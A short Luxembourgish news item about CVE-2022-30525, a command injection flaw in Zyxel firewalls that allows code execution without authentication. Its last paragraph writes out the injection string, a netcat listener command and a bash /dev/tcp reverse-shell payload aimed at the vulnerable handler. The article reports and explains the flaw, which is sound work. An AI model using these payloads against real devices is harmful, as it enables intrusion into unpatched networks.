Vulnerabilitéit an Zyxel Firewalls déi Code Ausféierung ouni Authentifikatioun erlaabt

Eng kritesch Schwachstelle (CVE-2022-30525) gouf an Zyxel Geräter vun der ATP, VPN an USG FLEX Serie identifizéiert, entwéckelt fir d'Operatioun vu Firewalls, IDS a VPN an Entreprisen ze organiséieren, wat en externen Ugräifer erlaabt Code op der Apparat ouni Benotzerrechter ouni Authentifikatioun. Fir en Attack auszeféieren, muss en Ugräifer fäeg sinn Ufroen un den Apparat mam HTTP/HTTPS Protokoll ze schécken. Zyxel huet d'Schwachheet am ZLD 5.30 Firmware Update fixéiert. Laut dem Shodan Service sinn et momentan 16213 potenziell vulnérabel Apparater um globalen Netzwierk, déi Ufroen iwwer HTTP/HTTPS akzeptéieren.

D'Operatioun gëtt duerch schéckt speziell entworf Kommandoen un de Web Handler /ztp/cgi-bin/handler, zougänglech ouni Authentifikatioun. De Problem ass verursaacht duerch de Mangel u properer Botzen vun Ufroparameter beim Ausféiere vun Kommandoen am System mat dem os.system Uruff, deen an der lib_wan_settings.py Bibliothéik benotzt gëtt a bei der Veraarbechtung vun der setWanPortSt Operatioun ausgefouert gëtt.

Zum Beispill, en Ugräifer kéint d'String passéieren "; ping 192.168.1.210;" wat zu der Ausféierung vum Kommando "ping 192.168.1.210" am System féiert. Fir Zougang zu der Kommandoshell ze kréien, kënnt Dir "nc -lvnp 1270" op Ärem System lafen, an dann eng ëmgedréint Verbindung initiéieren andeems Dir eng Ufro un den Apparat mat der '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

Source: opennet.ru

Setzt e Commentaire